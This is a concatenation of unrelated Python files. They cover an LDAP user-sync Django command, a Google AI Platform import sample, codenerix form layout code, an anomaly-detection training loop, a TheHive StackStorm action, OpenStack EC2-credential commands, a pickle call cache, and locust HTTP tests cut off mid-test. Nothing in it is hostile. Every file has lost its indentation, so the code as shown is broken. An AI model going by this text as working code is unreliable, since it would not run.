headers_result + "\n#define LSH_GLFW_IMPLEMENTATION\n" + source_result)
|
import ldap3
from allauth.socialaccount.models import SocialAccount
from django.conf import settings
from base.management import BaseCommand
def init_ldap():
server = ldap3.Server("ldap://ads.mwn.de")
connection = ldap3.Connection(
server,
"CN=%s,OU=Users,ou=TU,ou=IAM,dc=ads,dc=mwn,dc=de" % settings.LDAP_USER,
settings.LDAP_PASSWORD,
)
return connection
def check_user_in_ldap(connection, uid):
return connection.search(
"ou=Users,ou=TU,ou=IAM,dc=ads,dc=mwn,dc=de", "(uid=%s)" % uid
)
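# The command below expects the bind credentials to be defined in the Django settings
# (configuration.py); the values shown here are illustrative placeholders:
#   LDAP_USER = "tu-service-account"   # CN of the bind user inside OU=Users,ou=TU,ou=IAM
#   LDAP_PASSWORD = "secret"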
class Command(BaseCommand):
help = "Verify state of users in Active Directory. Deactivate old users."
def add_arguments(self, parser):
parser.add_argument(
"--delete",
action="store_true",
dest="delete",
default=False,
help="Whether to delete instead of deactivate old users.",
)
def handle(self, *args, **options):
if not (
hasattr(settings, "LDAP_USER")
and hasattr(settings, "LDAP_PASSWORD")
):
self.stdout.write(
"Please set LDAP_USER and LDAP_PASSWORD in configuration.py."
)
return
connection = init_ldap()
connection.bind()
activate_count = 0
delete_count = 0
deactivate_count = 0
for sa in SocialAccount.objects.all():
if check_user_in_ldap(connection, sa.uid):
if not sa.user.is_active:
sa.user.is_active = True
sa.user.save()
activate_count += 1
elif options["delete"]:
sa.user.delete()
delete_count += 1
elif sa.user.is_active:
sa.user.is_active = False
sa.user.save()
deactivate_count += 1
connection.unbind()
self.stdout.write(
"Activated: %s, Deactivated: %s, Deleted: %s, Verified: %s"
% (
activate_count,
deactivate_count,
delete_count,
len(SocialAccount.objects.all()),
)
)
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START aiplatform_import_data_sample]
from google.cloud import aiplatform
def import_data_sample(
project: str,
dataset_id: str,
gcs_source_uri: str,
import_schema_uri: str,
location: str = "us-central1",
api_endpoint: str = "us-central1-aiplatform.googleapis.com",
timeout: int = 1800,
):
client_options = {"api_endpoint": api_endpoint}
# Initialize client that will be used to create and send requests.
# This client only needs to be created once, and can be reused for multiple requests.
client = aiplatform.gapic.DatasetServiceClient(client_options=client_options)
# Here we use only one import config with one source
import_configs = [
{
"gcs_source": {"uris": [gcs_source_uri]},
"import_schema_uri": import_schema_uri,
}
]
name = client.dataset_path(project=project, location=location, dataset=dataset_id)
response = client.import_data(name=name, import_configs=import_configs)
print("Long running operation:", response.operation.name)
import_data_response = response.result(timeout=timeout)
print("import_data_response:", import_data_response)
# [END aiplatform_import_data_sample]
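# Illustrative invocation (all values are placeholders, including the schema URI):
#   import_data_sample(
#       project="my-project",
#       dataset_id="1234567890",
#       gcs_source_uri="gs://my-bucket/data/import.jsonl",
#       import_schema_uri="gs://google-cloud-aiplatform/schema/dataset/ioformat/"
#                         "image_classification_single_label_io_format_1.0.0.yaml",
#   )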
|
# -*- coding: utf-8 -*-
#
# django-codenerix
#
# Codenerix GNU
#
# Project URL : http://www.codenerix.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from codenerix.djng.angular_model import NgModelFormMixin
from codenerix.djng import NgFormValidationMixin, NgForm, NgModelForm
from django.utils.translation import gettext as _
from django.forms.widgets import Select, CheckboxInput
from django.forms import NullBooleanField
from codenerix.helpers import model_inspect
from codenerix.widgets import (
StaticSelect,
DynamicSelect,
DynamicInput,
MultiStaticSelect,
MultiDynamicSelect,
)
class BaseForm(object):
def __init__(self, *args, **kwargs):
self.__language = None
self.attributes = {}
return super(BaseForm, self).__init__(*args, **kwargs)
def set_language(self, language):
self.__language = language
def set_attribute(self, key, value):
self.attributes[key] = value
def get_name(self):
# If the name attribute exists in Meta
if "name" in self.Meta.__dict__:
# Try to get name from Meta
name = self.Meta.name
else:
# If not try to find it automatically
info = model_inspect(self.Meta.model())
if info["verbose_name"]:
name = info["verbose_name"]
else:
name = info["modelname"]
return name
def __errors__(self):
return []
def clean_color(self):
color = self.cleaned_data["color"]
if len(color) != 0:
valores_validos = "#0123456789abcdefABCDEF"
r = True
for lt in color:
if lt not in valores_validos:
r = False
break
if not r or color[0] != "#" or not (len(color) == 4 or len(color) == 7):
self._errors["color"] = [_("Invalid color")]
return color
else:
return color
else:
return color
def get_errors(self):
# Where to look for fields
if "list_errors" in dir(self):
list_errors = self.list_errors
else:
# r = self.non_field_errors()
# list_errors = [element[5] for element in list(self.non_field_errors())[:-1]]
list_errors = []
for element in list(self.non_field_errors())[:-1]:
if len(element) >= 5:
list_errors.append(element[5])
return list_errors
def __groups__(self):
return []
def get_groups(self, gs=None, processed=[], initial=True):
"""
<--------------------------------------- 12 columns ------------------------------------>
<--- 6 columns ---> <--- 6 columns --->
------------------------------------------ ------------------------------------------
| Info | | Personal |
|==========================================| |==========================================|
| ----------------- ------------------ | | |
| | Passport | | Name | | | Phone Zipcode |
| |=================| | [.....] [.....] | | | [...........................] [.......] |
| | CID Country | | <- 6 -> <- 6 -> | | | <--- 8 columns ---> <-4 col-> |
| | [.....] [.....] | | | | | |
| | <- 6 -> <- 6 -> | ----------------- | | Address |
| ----------------- | | [.....................................] |
------------------------------------------ | <--- 12 columns ---> |
| [..] number |
| <--- 12 columns ---> |
| |
------------------------------------------
group = [
(_('Info'),(6,'#8a6d3b','#fcf8e3','center'),
(_('Identification'),6,
["cid",6],
["country",6],
),
(None,6,
["name",None,6],
["surname",None,6,False],
),
),
(_('Personal'),6,
["phone",None,8],
["zipcode",None,4],
["address",None,12],
["number",None,12, True],
),
]
Group: it is defined as tuple with 3 or more elements:
Grammar: (<Name>, <Attributes>, <Element1>, <Element2>, ..., <ElementN>)
If <Name> is None: no name will be given to the group and no panel decoration will be shown
If <Size in columns> is None: default of 6 will be used
<Attributes>:
it can be an integer that represent the size in columns
it can be a tuple with several attributes where each element represents:
(<Size in columns>,'#<Font color>','#<Background color>','<Alignment>')
<Element>:
it can be a Group
it can be a Field
Examples:
('Info', 6, ["name",6], ["surname",6]) -> Info panel using 6 columns with 2 boxes 6 columns for each with name and surname inputs
('Info', (6,None,'#fcf8e3','center'), ["name",6], ["surname",6]) -> Info panel using 6 columns with a yellow brackground in centered title, 2 boxes, 6 columns for each with name and surname inputs
('Info', 12, ('Name', 6, ["name",12]), ('Surname',6, ["surname",12])) -> Info panel using 12 columns with 2 panels inside
of 6 columns each named "Name" and "Surname" and inside each of them an input "name" and "surname" where it belongs.
Field: must be a list with at least 1 element in it:
Grammar: [<Name of field>, <Size in columns>, <Label>]
<Name of field>:
This must be filled always
It is the input's name inside the form
Must exists as a form element or as a grouped form element
<Size in columns>:
Size of the input in columns
If it is not defined or if it is defined as None: default of 6 will be used
<Label>:
If it is defined as False: the label for this field will not be shown
If it is not defined or if it is defined as None: default of True will be used (default input's label will be shown)
If it is a string: this string will be shown as a label
Examples:
['age'] Input 'age' will be shown with 6 columns and its default label
['age',8] Input 'age' will be shown with 8 columns and its default label
['age', None, False] Input 'age' will be shown with 6 columns and NO LABEL
['age',8,False] Input 'age' will be shown with 8 columns and NO LABEL
['age',8,_("Age in days")] Input 'age' will be shown with 8 columns and translated label text "Age in days" to user's language
['age',8,_("Age in days"), True] Input 'age' will be shown with 8 columns and translated label text "Age in days" to user's language, and input inline with label
['age',6, None, None, None, None, None, ["ng-click=functionjs('param1')", "ng-change=functionjs2()"]] Input 'age' with extras functions
['age',None,None,None,None, 'filter'] Input 'age' with extras filter ONLY DETAILS
['age',6, {'color': 'red'}] Input 'age' will be shown with a red title
"""
# Check if language is set
if not self.__language:
raise IOError("ERROR: No language suplied!")
# Initialize the list
if initial:
processed = []
# Where to look for fields
if "list_fields" in dir(self):
list_fields = self.list_fields
check_system = "html_name"
else:
list_fields = self
check_system = "name"
# Default attributes for fields
attributes = [
("columns", 6),
("color", None),
("bgcolor", None),
("textalign", None),
("inline", False), # input in line with label
("label", True),
("extra", None),
("extra_div", None),
("foreign_info", {}),
]
labels = [x[0] for x in attributes]
# Get groups if none was given
if gs is None:
gs = self.__groups__()
# Prepare the answer
groups = []
# Prepare focus control
focus_first = None
focus_must = None
# html helper for groups and fields
html_helper = self.html_helper()
# Start processing
for g in gs:
token = {}
token["name"] = g[0]
if token["name"] in html_helper:
if "pre" in html_helper[token["name"]]:
token["html_helper_pre"] = html_helper[token["name"]]["pre"]
if "post" in html_helper[token["name"]]:
token["html_helper_post"] = html_helper[token["name"]]["post"]
styles = g[1]
if type(styles) is tuple:
if len(styles) >= 1:
token["columns"] = g[1][0]
if len(styles) >= 2:
token["color"] = g[1][1]
if len(styles) >= 3:
token["bgcolor"] = g[1][2]
if len(styles) >= 4:
token["textalign"] = g[1][3]
if len(styles) >= 5:
token["inline"] = g[1][4]
if len(styles) >= 7:
token["extra"] = g[1][5]
if len(styles) >= 8:
token["extra_div"] = g[1][6]
else:
token["columns"] = g[1]
fs = g[2:]
fields = []
for f in fs:
# Field
atr = {}
# Decide whether this is a Group or not
if type(f) == tuple:
# Recursive
fields += self.get_groups([list(f)], processed, False)
else:
try:
list_type = [
str,
unicode,
]
except NameError:
list_type = [
str,
]
# Check if it is a list
if type(f) == list:
# This is a field with attributes, get the name
field = f[0]
if (
html_helper
and token["name"] in html_helper
and "items" in html_helper[token["name"]]
and field in html_helper[token["name"]]["items"]
):
if "pre" in html_helper[token["name"]]["items"][field]:
atr["html_helper_pre"] = html_helper[token["name"]][
"items"
][field]["pre"]
if "post" in html_helper[token["name"]]["items"][field]:
atr["html_helper_post"] = html_helper[token["name"]][
"items"
][field]["post"]
# Process each attribute (if any)
dictionary = False
for idx, element in enumerate(f[1:]):
if type(element) == dict:
dictionary = True
for key in element.keys():
if key in labels:
atr[key] = element[key]
else:
raise IOError(
"Unknown attribute '{0}' as field '{1}' in list of fields".format(
key, field
)
)
else:
if not dictionary:
if element is not None:
atr[attributes[idx][0]] = element
else:
raise IOError(
"We already processed a dicionary element in this list of fields, you can not add anoother type of elements to it, you must keep going with dictionaries"
)
elif type(f) in list_type:
field = f
else:
raise IOError(
"Uknown element type '{0}' inside group '{1}'".format(
type(f), token["name"]
)
)
# Get the Django Field object
found = None
foundbool = False
for infield in list_fields:
if infield.__dict__[check_system] == field:
found = infield
foundbool = True
break
if foundbool:
# Get attributes (required and original attributes)
wrequired = found.field.widget.is_required
wattrs = found.field.widget.attrs
# Fill base attributes
atr["name"] = found.html_name
atr["input"] = found
atr["inputbool"] = foundbool
atr["focus"] = False
# Set focus
if focus_must is None:
if focus_first is None:
focus_first = atr
if wrequired:
focus_must = atr
# Autocomplete
if "autofill" in dir(self.Meta):
autofill = self.Meta.autofill.get(found.html_name, None)
atr["autofill"] = autofill
if autofill:
# Check format of the request
autokind = autofill[0]
if type(autokind) == str:
# Using new format
if autokind == "select":
# If autofill is True for this field set the DynamicSelect widget
found.field.widget = DynamicSelect(wattrs)
elif autokind == "multiselect":
# If autofill is True for this field set the DynamicSelect widget
found.field.widget = MultiDynamicSelect(wattrs)
elif autokind == "input":
# If autofill is True for this field set the DynamicSelect widget
found.field.widget = DynamicInput(wattrs)
else:
raise IOError(
"Autofill filled using new format but autokind is '{}' and I only know 'input' or 'select'".format(
autokind
)
)
# Configure the field
found.field.widget.is_required = wrequired
found.field.widget.form_name = self.form_name
found.field.widget.field_name = infield.html_name
found.field.widget.autofill_deepness = autofill[1]
found.field.widget.autofill_url = autofill[2]
found.field.widget.autofill = autofill[3:]
else:
# Get old information [COMPATIBILITY WITH OLD VERSION]
# If autofill is True for this field set the DynamicSelect widget
found.field.widget = DynamicSelect(wattrs)
found.field.widget.is_required = wrequired
found.field.widget.form_name = self.form_name
found.field.widget.field_name = infield.html_name
found.field.widget.autofill_deepness = autofill[0]
found.field.widget.autofill_url = autofill[1]
found.field.widget.autofill = autofill[2:]
else:
# Set we don't have autofill for this field
atr["autofill"] = None
# Check if we have to replace the widget with a newer one
if isinstance(found.field.widget, Select) and not isinstance(
found.field.widget, DynamicSelect
):
if not isinstance(
found.field.widget, MultiStaticSelect
) and not isinstance(
found.field.widget, MultiDynamicSelect
):
found.field.widget = StaticSelect(wattrs)
found.field.widget.choices = found.field.choices
found.field.widget.is_required = wrequired
found.field.widget.form_name = self.form_name
found.field.widget.field_name = infield.html_name
# Fill all attributes
for (attribute, default) in attributes:
if attribute not in atr.keys():
atr[attribute] = default
# Fill label
if atr["label"] is True:
atr["label"] = found.label
# Set language
flang = getattr(found.field, "set_language", None)
if flang:
flang(self.__language)
flang = getattr(found.field.widget, "set_language", None)
if flang:
flang(self.__language)
# Attach the element
fields.append(atr)
# Remember we have processed it
processed.append(found.__dict__[check_system])
else:
raise IOError(
"Unknown field '{0}' specified in group '{1}'".format(
f, token["name"]
)
)
token["fields"] = fields
groups.append(token)
# Add the rest of attributes we didn't use yet
if initial:
fields = []
for infield in list_fields:
if infield.__dict__[check_system] not in processed:
# Get attributes (required and original attributes)
wattrs = infield.field.widget.attrs
wrequired = infield.field.widget.is_required
# Prepare attr
atr = {}
# Fill base attributes
atr["name"] = infield.html_name
atr["input"] = infield
atr["inputbool"] = True
atr["focus"] = False
# Set focus
if focus_must is None:
if focus_first is None:
focus_first = atr
if wrequired:
focus_must = atr
# Autocomplete
if "autofill" in dir(self.Meta):
autofill = self.Meta.autofill.get(infield.html_name, None)
atr["autofill"] = autofill
if autofill:
# Check format of the request
autokind = autofill[0]
if type(autokind) == str:
# Using new format
if autokind == "select":
# If autofill is True for this field set the DynamicSelect widget
infield.field.widget = DynamicSelect(wattrs)
elif autokind == "multiselect":
# If autofill is True for this field set the DynamicSelect widget
infield.field.widget = MultiDynamicSelect(wattrs)
elif autokind == "input":
# If autofill is True for this field set the DynamicSelect widget
infield.field.widget = DynamicInput(wattrs)
else:
raise IOError(
"Autofill filled using new format but autokind is '{}' and I only know 'input' or 'select'".format(
autokind
)
)
# Configure the field
infield.field.widget.is_required = wrequired
infield.field.widget.form_name = self.form_name
infield.field.widget.field_name = infield.html_name
infield.field.widget.autofill_deepness = autofill[1]
infield.field.widget.autofill_url = autofill[2]
infield.field.widget.autofill = autofill[3:]
else:
# Get old information [COMPATIBILITY WITH OLD VERSION]
# If autofill is True for this field set the DynamicSelect widget
infield.field.widget = DynamicSelect(wattrs)
infield.field.widget.is_required = wrequired
infield.field.widget.form_name = self.form_name
infield.field.widget.field_name = infield.html_name
infield.field.widget.autofill_deepness = autofill[0]
infield.field.widget.autofill_url = autofill[1]
infield.field.widget.autofill = autofill[2:]
else:
# Mark that this field has no autofill
atr["autofill"] = None
# Check if we have to replace the widget with a newer one
if isinstance(infield.field.widget, Select) and not isinstance(
infield.field.widget, DynamicSelect
):
if isinstance(infield.field, NullBooleanField):
infield.field.widget = CheckboxInput(wattrs)
elif not isinstance(
infield.field.widget, MultiStaticSelect
) and not isinstance(infield.field.widget, MultiDynamicSelect):
infield.field.widget = StaticSelect(wattrs)
if hasattr(infield.field.widget, "choices") and hasattr(
infield.field, "choices"
):
infield.field.widget.choices = infield.field.choices
infield.field.widget.is_required = wrequired
infield.field.widget.form_name = self.form_name
infield.field.widget.field_name = infield.html_name
# Fill all attributes
for (attribute, default) in attributes:
if attribute not in atr.keys():
atr[attribute] = default
# Fill label
if atr["label"] is True:
atr["label"] = infield.label
# Set language
flang = getattr(infield.field, "set_language", None)
if flang:
flang(self.__language)
flang = getattr(infield.field.widget, "set_language", None)
if flang:
flang(self.__language)
# Attach the attribute
fields.append(atr)
# Save the new elements
if fields:
groups.append({"name": None, "columns": 12, "fields": fields})
# Set focus
if focus_must:
focus_must["focus"] = True
elif focus_first is not None:
focus_first["focus"] = True
# Return the resulting groups
return groups
def html_helper(self):
"""
g={'Group Name':{
'pre': 'text pre div',
'post': 'text post div',
'items': {
'input name':{'pre': 'text pre name', 'post': 'text post name'},
'example':{'pre': '<p>text <b>for</b> help</p>', 'post': '<div>more help</div>'},
}
}
}
"""
return {}
class GenModelForm(BaseForm, NgModelFormMixin, NgFormValidationMixin, NgModelForm):
pass
class GenForm(BaseForm, NgFormValidationMixin, NgForm):
add_djng_error = False
class Meta:
name = ""
|
import numpy as np
import torch
from sklearn.metrics import roc_auc_score
from tqdm import tqdm
import config as c
from model import get_cs_flow_model, save_model, FeatureExtractor, nf_forward
from utils import *
def train(train_loader, test_loader):
model = get_cs_flow_model()
optimizer = torch.optim.Adam(model.parameters(), lr=c.lr_init, eps=1e-04, weight_decay=1e-5)
model.to(c.device)
if not c.pre_extracted:
fe = FeatureExtractor()
fe.eval()
fe.to(c.device)
for param in fe.parameters():
param.requires_grad = False
z_obs = Score_Observer('AUROC')
for epoch in range(c.meta_epochs):
# train some epochs
model.train()
if c.verbose:
print(F'\nTrain epoch {epoch}')
for sub_epoch in range(c.sub_epochs):
train_loss = list()
for i, data in enumerate(tqdm(train_loader, disable=c.hide_tqdm_bar)):
optimizer.zero_grad()
inputs, labels = preprocess_batch(data) # move to device and reshape
if not c.pre_extracted:
inputs = fe(inputs)
z, jac = nf_forward(model, inputs)
loss = get_loss(z, jac)
train_loss.append(t2np(loss))
loss.backward()
norm = torch.nn.utils.clip_grad_norm_(model.parameters(), c.max_grad_norm)
optimizer.step()
mean_train_loss = np.mean(train_loss)
if c.verbose and epoch == 0 and sub_epoch % 4 == 0:
print('Epoch: {:d}.{:d} \t train loss: {:.4f}'.format(epoch, sub_epoch, mean_train_loss))
# evaluate
model.eval()
if c.verbose:
print('\nCompute loss and scores on test set:')
test_loss = list()
test_z = list()
test_labels = list()
with torch.no_grad():
for i, data in enumerate(tqdm(test_loader, disable=c.hide_tqdm_bar)):
inputs, labels = preprocess_batch(data)
if not c.pre_extracted:
inputs = fe(inputs)
z, jac = nf_forward(model, inputs)
loss = get_loss(z, jac)
z_concat = t2np(concat_maps(z))
score = np.mean(z_concat ** 2, axis=(1, 2))  # per-sample anomaly score: mean squared latent value
test_z.append(score)
test_loss.append(t2np(loss))
test_labels.append(t2np(labels))
test_loss = np.mean(np.array(test_loss))
if c.verbose:
print('Epoch: {:d} \t test_loss: {:.4f}'.format(epoch, test_loss))
test_labels = np.concatenate(test_labels)
is_anomaly = np.array([0 if l == 0 else 1 for l in test_labels])
anomaly_score = np.concatenate(test_z, axis=0)
z_obs.update(roc_auc_score(is_anomaly, anomaly_score), epoch,
print_score=c.verbose or epoch == c.meta_epochs - 1)
if c.save_model:
model.to('cpu')
save_model(model, c.modelname)
return z_obs.max_score, z_obs.last, z_obs.min_loss_score
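# Hypothetical entry point (not part of the original file). The loader helper
# below is an assumption about the project's utils module, not a confirmed API:
#
#     if __name__ == '__main__':
#         train_loader, test_loader = make_dataloaders(...)  # assumed helper
#         best_auc, last_auc, min_loss_auc = train(train_loader, test_loader)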
|
import random
from thehive4pyextended import TheHiveApiExtended
from thehive4py.query import Eq
from st2common.runners.base_action import Action
__all__ = [
'RunAnalyzerOnDataTypeAction'
]
class RunAnalyzerOnDataTypeAction(Action):
def run(self, case_id, data_type, analyzer_name, linked_task_name=None):
api = TheHiveApiExtended(self.config['thehive_url'], self.config['thehive_api_key'])
linked_task_id = None
if linked_task_name:
response = api.get_case_tasks(case_id, query=Eq('title', linked_task_name))
if response.status_code == 200:
tasks = response.json()
if len(tasks) == 1:
linked_task_id = tasks[0]['id']
else:
raise ValueError('[RunAnalyzerOnDataTypeAction]: task not found')
else:
raise ValueError('[RunAnalyzerOnDataTypeAction]: tasks status_code %d'
% response.status_code)
analyzer = api.get_analyzer_by_name_and_data_type(analyzer_name, data_type)
response = api.get_case_observables(case_id, query=Eq('dataType', data_type))
if response.status_code == 200:
observables = response.json()
if len(observables) == 1:
for observable in observables:
cortex_id = random.choice(analyzer['cortexIds'])
response_job = api.run_analyzer(cortex_id, observable['id'], analyzer['id'])
if response_job.status_code == 200:
job = response_job.json()
if linked_task_id:
self.action_service.set_value(
name='thehive_job_{}'.format(job['id']),
value=linked_task_id,
local=False
)
return job
else:
raise ValueError('[RunAnalyzerOnDataTypeAction]: job status_code %d'
                 % response_job.status_code)
else:
raise ValueError('[RunAnalyzerOnDataTypeAction]: expected exactly one observable of type %s' % data_type)
else:
raise ValueError('[RunAnalyzerOnDataTypeAction]: status_code %d' % response.status_code)
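# Illustrative StackStorm invocation (not part of the original file); the pack
# name, action ref and parameter values are assumptions:
#
#     st2 run thehive.run_analyzer_on_data_type case_id=AWxy1234 data_type=ip \
#         analyzer_name=Abuse_Finder_3_0 linked_task_name="Analysis"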
|
# Copyright 2012 OpenStack Foundation
# Copyright 2013 Nebula Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Identity v2 EC2 Credentials action implementations"""
import logging
from osc_lib.command import command
from osc_lib import exceptions
from osc_lib import utils
from openstackclient.i18n import _
LOG = logging.getLogger(__name__)
class CreateEC2Creds(command.ShowOne):
_description = _("Create EC2 credentials")
def get_parser(self, prog_name):
parser = super(CreateEC2Creds, self).get_parser(prog_name)
parser.add_argument(
'--project',
metavar='<project>',
help=_(
'Create credentials in project '
'(name or ID; default: current authenticated project)'
),
)
parser.add_argument(
'--user',
metavar='<user>',
help=_(
'Create credentials for user '
'(name or ID; default: current authenticated user)'
),
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
if parsed_args.project:
project = utils.find_resource(
identity_client.tenants,
parsed_args.project,
).id
else:
# Get the project from the current auth
project = self.app.client_manager.auth_ref.project_id
if parsed_args.user:
user = utils.find_resource(
identity_client.users,
parsed_args.user,
).id
else:
# Get the user from the current auth
user = self.app.client_manager.auth_ref.user_id
creds = identity_client.ec2.create(user, project)
info = {}
info.update(creds._info)
if 'tenant_id' in info:
info.update(
{'project_id': info.pop('tenant_id')}
)
return zip(*sorted(info.items()))
class DeleteEC2Creds(command.Command):
_description = _("Delete EC2 credentials")
def get_parser(self, prog_name):
parser = super(DeleteEC2Creds, self).get_parser(prog_name)
parser.add_argument(
'access_keys',
metavar='<access-key>',
nargs='+',
help=_('Credentials access key(s)'),
)
parser.add_argument(
'--user',
metavar='<user>',
help=_('Delete credentials for user (name or ID)'),
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
if parsed_args.user:
user = utils.find_resource(
identity_client.users,
parsed_args.user,
).id
else:
# Get the user from the current auth
user = self.app.client_manager.auth_ref.user_id
result = 0
for access_key in parsed_args.access_keys:
try:
identity_client.ec2.delete(user, access_key)
except Exception as e:
result += 1
LOG.error(_("Failed to delete EC2 credentials with "
"access key '%(access_key)s': %(e)s"),
{'access_key': access_key, 'e': e})
if result > 0:
total = len(parsed_args.access_keys)
msg = (_("%(result)s of %(total)s EC2 keys failed "
"to delete.") % {'result': result, 'total': total})
raise exceptions.CommandError(msg)
class ListEC2Creds(command.Lister):
_description = _("List EC2 credentials")
def get_parser(self, prog_name):
parser = super(ListEC2Creds, self).get_parser(prog_name)
parser.add_argument(
'--user',
metavar='<user>',
help=_('Filter list by user (name or ID)'),
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
if parsed_args.user:
user = utils.find_resource(
identity_client.users,
parsed_args.user,
).id
else:
# Get the user from the current auth
user = self.app.client_manager.auth_ref.user_id
columns = ('access', 'secret', 'tenant_id', 'user_id')
column_headers = ('Access', 'Secret', 'Project ID', 'User ID')
data = identity_client.ec2.list(user)
return (column_headers,
(utils.get_item_properties(
s, columns,
formatters={},
) for s in data))
class ShowEC2Creds(command.ShowOne):
_description = _("Display EC2 credentials details")
def get_parser(self, prog_name):
parser = super(ShowEC2Creds, self).get_parser(prog_name)
parser.add_argument(
'access_key',
metavar='<access-key>',
help=_('Credentials access key'),
)
parser.add_argument(
'--user',
metavar='<user>',
help=_('Show credentials for user (name or ID)'),
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
if parsed_args.user:
user = utils.find_resource(
identity_client.users,
parsed_args.user,
).id
else:
# Get the user from the current auth
user = self.app.client_manager.auth_ref.user_id
creds = identity_client.ec2.get(user, parsed_args.access_key)
info = {}
info.update(creds._info)
if 'tenant_id' in info:
info.update(
{'project_id': info.pop('tenant_id')}
)
return zip(*sorted(info.items()))
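# Typical CLI usage of the commands implemented above (names and keys are
# placeholders):
#
#     openstack ec2 credentials create --project demo --user alice
#     openstack ec2 credentials list --user alice
#     openstack ec2 credentials show <access-key>
#     openstack ec2 credentials delete <access-key> --user alice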
|
import logging
import pickle
_logger = logging.getLogger("theano.gof.callcache")
class CallCache:
def __init__(self, filename=None):
self.filename = filename
try:
if filename is None:
raise OSError("bad filename") # just goes to except
with open(filename, "rb") as f:
self.cache = pickle.load(f)
except OSError:
self.cache = {}
def persist(self, filename=None):
"""
Cache "filename" as a pickle file
"""
if filename is None:
filename = self.filename
with open(filename, "w") as f:
pickle.dump(self.cache, f)
def call(self, fn, args=(), key=None):
"""
Retrieve item from the cache(if available)
based on a key
Parameters:
----------
key
parameter to retrieve cache item
fn,args
key to retrieve if "key" is None
"""
if key is None:
key = (fn, tuple(args))
if key not in self.cache:
_logger.debug("cache miss %i", len(self.cache))
self.cache[key] = fn(*args)
else:
_logger.debug("cache hit %i", len(self.cache))
return self.cache[key]
def __del__(self):
try:
if self.filename:
self.persist()
except Exception as e:
_logger.error("persist failed %s %s", self.filename, e)
|
import socket
import gevent
import time
from tempfile import NamedTemporaryFile
from locust.user import task, TaskSet
from locust.contrib.fasthttp import FastHttpSession
from locust import FastHttpUser
from locust.exception import CatchResponseError, InterruptTaskSet, ResponseError
from locust.main import is_user_class
from .testcases import WebserverTestCase, LocustTestCase
from .util import create_tls_cert
class TestFastHttpSession(WebserverTestCase):
def get_client(self):
return FastHttpSession(self.environment, base_url="http://127.0.0.1:%i" % self.port, user=None)
def test_get(self):
s = self.get_client()
r = s.get("/ultra_fast")
self.assertEqual(200, r.status_code)
def test_connection_error(self):
s = FastHttpSession(self.environment, "http://localhost:1", user=None)
r = s.get("/", timeout=0.1)
self.assertEqual(r.status_code, 0)
self.assertEqual(None, r.content)
self.assertEqual(1, len(self.runner.stats.errors))
self.assertTrue(isinstance(r.error, ConnectionRefusedError))
self.assertTrue(isinstance(next(iter(self.runner.stats.errors.values())).error, ConnectionRefusedError))
def test_404(self):
s = self.get_client()
r = s.get("/does_not_exist")
self.assertEqual(404, r.status_code)
self.assertEqual(1, self.runner.stats.get("/does_not_exist", "GET").num_failures)
def test_204(self):
s = self.get_client()
r = s.get("/status/204")
self.assertEqual(204, r.status_code)
self.assertEqual(1, self.runner.stats.get("/status/204", "GET").num_requests)
self.assertEqual(0, self.runner.stats.get("/status/204", "GET").num_failures)
def test_streaming_response(self):
"""
Test a request to an endpoint that returns a streaming response
"""
s = self.get_client()
r = s.get("/streaming/30")
# verify that the time reported includes the download time of the whole streamed response
self.assertGreater(self.runner.stats.get("/streaming/30", method="GET").avg_response_time, 250)
self.runner.stats.clear_all()
# verify that response time does NOT include whole download time, when using stream=True
r = s.get("/streaming/30", stream=True)
self.assertGreaterEqual(self.runner.stats.get("/streaming/30", method="GET").avg_response_time, 0)
self.assertLess(self.runner.stats.get("/streaming/30", method="GET").avg_response_time, 250)
# download the content of the streaming response (so we don't get an ugly exception in the log)
_ = r.content
def test_slow_redirect(self):
s = self.get_client()
url = "/redirect?url=/redirect&delay=0.5"
r = s.get(url)
stats = self.runner.stats.get(url, method="GET")
self.assertEqual(1, stats.num_requests)
self.assertGreater(stats.avg_response_time, 500)
def test_post_redirect(self):
s = self.get_client()
url = "/redirect"
r = s.post(url)
self.assertEqual(200, r.status_code)
post_stats = self.runner.stats.get(url, method="POST")
get_stats = self.runner.stats.get(url, method="GET")
self.assertEqual(1, post_stats.num_requests)
self.assertEqual(0, get_stats.num_requests)
def test_cookie(self):
s = self.get_client()
r = s.post("/set_cookie?name=testcookie&value=1337")
self.assertEqual(200, r.status_code)
r = s.get("/get_cookie?name=testcookie")
self.assertEqual("1337", r.content.decode())
def test_head(self):
s = self.get_client()
r = s.head("/request_method")
self.assertEqual(200, r.status_code)
self.assertEqual("", r.content.decode())
def test_delete(self):
s = self.get_client()
r = s.delete("/request_method")
self.assertEqual(200, r.status_code)
self.assertEqual("DELETE", r.content.decode())
def test_patch(self):
s = self.get_client()
r = s.patch("/request_method")
self.assertEqual(200, r.status_code)
self.assertEqual("PATCH", r.content.decode())
def test_options(self):
s = self.get_client()
r = s.options("/request_method")
self.assertEqual(200, r.status_code)
self.assertEqual("", r.content.decode())
self.assertEqual(
set(["OPTIONS", "DELETE", "PUT", "GET", "POST", "HEAD", "PATCH"]),
set(r.headers["allow"].split(", ")),
)
def test_json_payload(self):
s = self.get_client()
r = s.post("/request_method", json={"foo": "bar"})
self.assertEqual(200, r.status_code)
def test_catch_response_fail_successful_request(self):
s = self.get_client()
with s.get("/ultra_fast", catch_response=True) as r:
